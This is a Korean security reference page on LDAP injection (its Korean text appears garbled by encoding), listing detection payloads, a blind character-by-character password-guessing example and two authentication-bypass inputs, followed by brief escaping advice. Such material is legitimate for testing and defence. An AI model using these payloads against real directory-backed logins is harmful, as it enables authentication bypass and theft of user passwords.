Security Cullinan

LDAP Injection

๐Ÿ” Introduction

LDAP Injeciton์€ LDAP(Lightweight Directory Access Protocol)์— ๋Œ€ํ•œ Injection ๊ณต๊ฒฉ์œผ๋กœ ์‚ฌ์šฉ์ž์˜ ์ž…๋ ฅ๊ฐ’์ด LDAP Query์— ์ง์ ‘ ์˜ํ–ฅ์„ ๋ผ์น  ์ˆ˜ ์žˆ์„ ๋•Œ ์ด๋ฅผ ํ†ตํ•ด ๋น„์ •์ƒ์ ์ธ LDAP ๋™์ž‘์„ ์œ ๋„ํ•˜๋Š” ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. ๋ณดํ†ต์˜ Injection ์ทจ์•ฝ์ ๊ณผ ๋น„์Šทํ•˜๊ฒŒ ์ „๋ฐ˜์ ์ธ ๊ณต๊ฒฉ ๋งค์ปค๋‹ˆ์ฆ˜์€ SQL Injection ๋“ฑ ๋Œ€๋‹ค์ˆ˜ Injection ๋ฐฉ์‹๊ณผ ๋™์ผํ•ฉ๋‹ˆ๋‹ค.

LDAP์ด๋ž€?

LDAP ์ž์ฒด๋Š” TCP/IP ์œ„์—์„œ DS(Directory Service)๋ฅผ ์กฐํšŒํ•˜๊ณ  ์ˆ˜์ •ํ•˜๋Š” Application Protocol ์ด์ง€๋งŒ, ๋ณดํ†ต์€ ๊ธฐ์—… ์ธํ”„๋ผ์—์„œ ์‚ฌ๋žŒ, ๊ธฐ๊ธฐ ๋“ฑ์˜ ์ธ์ฆ์—์„œ ์‚ฌ์šฉ๋˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ๋งŽ์Šต๋‹ˆ๋‹ค. ๊ทธ๋ž˜์„œ LDAP Injection์˜ ๋Œ€ํ‘œ์ ์ธ ๋ฆฌ์Šคํฌ๊ฐ€ ์ธ์ฆ ์šฐํšŒ์ž…๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

Error base

Response ๋‚ด ๋…ธ์ถœ๋˜๋Š” ์—๋Ÿฌ๋ฅผ ํ†ตํ•ด LDAP ๊ตฌ๋ฌธ์˜ ์ผ๋ถ€๊ฐ€ ๋…ธ์ถœ๋˜๋Š” ๊ฒฝ์šฐ LDAP Injection์— ์ทจ์•ฝํ•  ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” ์ด ์ •๋ณด๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ LDAP Query๋ฅผ ์œ ์ถ”ํ•˜์—ฌ ์˜๋„๋˜์ง€ ์•Š์€ ์•ก์…˜์„ ์ˆ˜ํ–‰ํ•˜๋„๋ก ์œ ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

Blind

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
(&(sn=administrator)(password=MY*))  : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK

Exploitation

1
2
3

user  = *)(uid=*))(|(uid=*
pass  = password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"

1
2
3

user  = admin)(!(&(1=0
pass  = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))

Attribute List

1
2
3
4
5
6
7
8
9

userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName

๐Ÿ›ก Defensive techniques

ํŠน์ˆ˜๋ฌธ์ž Escape

์•„๋ž˜ ํŠน์ˆ˜๋ฌธ์ž์— ๋Œ€ํ•ด์„œ Escape ์ฒ˜๋ฆฌ๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

* ( ) . & - _ [ ] backktick(`) ~ | @ $ % ^ ? : { } ! '

๊ทธ๋ฆฌ๊ณ  ๊ฐ€๋Šฅํ•˜๋‹ค๋ฉด framework, library ๋“ฑ์—์„œ ์ œ๊ณตํ•˜๋Š” ๋ณด์•ˆ๊ธฐ๋Šฅ์„ ์ด์šฉํ•ด ๋ง‰๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

๐Ÿ•น Tools

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0
© 2022 HAHWUL